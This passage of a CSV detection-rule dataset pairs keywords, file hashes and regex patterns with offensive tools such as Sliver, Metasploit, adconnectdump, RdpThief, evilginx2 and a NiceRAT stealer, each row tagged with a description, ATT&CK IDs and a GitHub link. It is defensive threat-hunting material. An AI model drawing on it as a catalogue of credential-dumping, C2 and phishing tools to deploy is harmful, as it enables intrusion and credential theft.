T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*adobe_top100_pass.txt*",".{0,1000}adobe_top100_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*adsearch* --domain-admins*",".{0,1000}adsearch.{0,1000}\s\-\-domain\-admins.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*adsearch.exe*",".{0,1000}adsearch\.exe.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*ADSearch.exe*",".{0,1000}ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADSearch.sln*",".{0,1000}ADSearch\.sln.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*ADSearch\ADSearch.cs*",".{0,1000}ADSearch\\ADSearch\.cs.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*adsearch-master.zip",".{0,1000}adsearch\-master\.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*ADSync passwords can be read or 
modified as local administrator only for ADSync version *",".{0,1000}ADSync\spasswords\scan\sbe\sread\sor\smodified\sas\slocal\sadministrator\sonly\sfor\sADSync\sversion\s.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*ADSyncGather.exe*",".{0,1000}ADSyncGather\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*ADSyncQuery*ADSync.mdf*.txt*",".{0,1000}ADSyncQuery.{0,1000}ADSync\.mdf.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*Advanced-SQL-Injection-Cheatsheet*",".{0,1000}Advanced\-SQL\-Injection\-Cheatsheet.{0,1000}","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all 
types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2694","643","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z" "*advantech_iview_networkservlet_cmd_inject.*",".{0,1000}advantech_iview_networkservlet_cmd_inject\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*adxcsouf2john.py*",".{0,1000}adxcsouf2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ADZero.py*",".{0,1000}ADZero\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","1","21","6","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z" 
"*ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676*",".{0,1000}ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16*",".{0,1000}ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384*",".{0,1000}ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe*",".{0,1000}ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14*",".{0,1000}ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9*",".{0,1000}ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74*",".{0,1000}ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5*",".{0,1000}ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430*",".{0,1000}ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363*",".{0,1000}AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699*",".{0,1000}ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12*",".{0,1000}ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722*",".{0,1000}ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae84192b77cec541a088d563dc5f20723123e096*",".{0,1000}ae84192b77cec541a088d563dc5f20723123e096.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102*",".{0,1000}ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*aeachknmefphepccionboohckonoeemg*",".{0,1000}aeachknmefphepccionboohckonoeemg.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of 
cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*AEC32155-D589-4150-8FE7-2900DF4554C8*",".{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69*",".{0,1000}aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64*",".{0,1000}aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09*",".{0,1000}aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*aem2john.py*",".{0,1000}aem2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AES_cryptor.py *",".{0,1000}AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" 
"*AesEncryptor.py*",".{0,1000}AesEncryptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23*",".{0,1000}af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*af2d9062b7788fc47385d8c6c645dfa0*",".{0,1000}af2d9062b7788fc47385d8c6c645dfa0.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*",".{0,1000}AF9C62A1\-F8D2\-4BE0\-B019\-0A7873E81EA9.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25*",".{0,1000}afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*afbcbjpbpfadlkmhmclhkeeodmamcflc*",".{0,1000}afbcbjpbpfadlkmhmclhkeeodmamcflc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 
"*afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd*",".{0,1000}afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d*",".{0,1000}afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8*",".{0,1000}afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d*",".{0,1000}afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187*",".{0,1000}affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" 